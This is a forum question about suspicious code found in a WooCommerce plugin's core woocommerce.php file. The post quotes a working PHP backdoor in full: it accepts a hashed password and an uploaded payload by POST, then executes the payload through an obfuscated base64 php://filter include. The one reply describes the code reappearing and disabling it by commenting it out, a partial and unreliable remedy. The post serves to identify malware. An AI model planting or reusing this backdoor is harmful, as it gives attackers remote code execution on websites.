Strange code being added to woocommerce.php file
Question
I have found this strange code within the core woocommerce.php file.
Does anyone understand what this code is trying to do? I suspect it is malware as it is not part of the core WooCommerce code.
I am trying to understand if it is being added by a plugin and is legitimate or if it is some form of virus/malware etc.
if (isset($_POST["_aey8iousjrkdf"],$_POST['WP_6cdd22']) && sha1($_POST['WP_6cdd22']) == "6cdd22ad6267ba73cd92bf8abd7ec2058740fa80") { $_oxyu = tempnam(sys_get_temp_dir(),"rlgalfarg"); file_put_contents($_oxyu,$_POST["_aey8iousjrkdf"]); require_once "php".":"."//filt"."e"."r/c"."onvert."."ba"."s"."e"."64-"."d"."e"."code/co"."n"."v"."er"."t.b"."a"."s"."e64-de"."co"."de/"."resou"."rce"."=".$_oxyu; unlink($_oxyu); die(); }
1 answers
solution1
0 2022-08-24 18:13:31
Had same problemm with this woocommerce.php. After removing code it just returning straight back. After researching and playing around I think I've found the way. I have added /* just before "if" and all code turned into just a comment. Now second day and nothing new returning to the place. Of course this is not the best way to do it and I'm not sure if it will stay as a comment but so far seems to be ok. If somebody can find full removal way please share with us here.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.